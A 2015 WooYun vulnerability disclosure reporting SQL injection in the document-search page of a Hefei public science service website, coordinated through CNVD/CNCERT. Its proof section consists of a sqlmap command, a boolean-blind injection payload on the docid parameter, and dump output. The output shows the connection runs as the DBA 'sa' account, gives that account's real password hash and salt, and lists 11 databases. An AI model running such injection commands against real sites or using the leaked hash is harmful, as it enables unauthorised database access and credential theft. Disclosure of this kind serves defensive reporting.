当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155548

漏洞标题:合肥市科技创新公共服务中心主站存在SQL注射漏洞(DBA权限/sa密码泄露/11个库)

相关厂商:合肥市科技创新公共服务中心

漏洞作者: 路人甲

提交时间:2015-11-24 20:54

修复时间:2016-01-11 16:58

公开时间:2016-01-11 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

文献检索主要适用于一些采购了万方、同方、维普科技期刊、学位论文等电子全文资源,采购了超星、书生等电子图书资源,或者采购了国外联机网络数据库资源用户名和口令的客户,以及需要进行采购资源、内部业务系统资源、互联网资源整合,如一些图书馆、科研院所、企业等,以进行各种信息资源整合和开展统一资源搜索服务。

详细说明:

地址:http://**.**.**.**/search/showdetail.aspx?rsid=37ebe474-acd4-4ff2-ba212b59eaf671a8&docid=9868&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A

$ python sqlmap.py -u "http://**.**.**.**/search/showdetail.aspx?rsid=37ebe474-acd4-4ff2-ba212b59eaf671a8&docid=9868&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A8" -p docid --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --dbs

漏洞证明:

---
Parameter: docid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: rsid=37ebe474-acd4-4ff2-ba21-2b59eaf671a8&docid=9868) AND 7789=7789 AND (3083=3083&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A8
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'sa'
current user is DBA: True
database management system users [1]:
[*] sa
database management system users password hashes:
[*] sa [1]:
password hash: 0x01004086ceb62e2c95b793b582c13c8fa2bdf941784b777e6f03
header: 0x0100
salt: 4086ceb6
mixedcase: 2e2c95b793b582c13c8fa2bdf941784b777e6f03
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: docid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: rsid=37ebe474-acd4-4ff2-ba21-2b59eaf671a8&docid=9868) AND 7789=7789 AND (3083=3083&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A8
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [11]:
[*] [uiniRMS(hefeisuo)]
[*] AdventureWorks
[*] AdventureWorksDW
[*] aspnetdb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-27 16:56

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。

最新状态:

暂无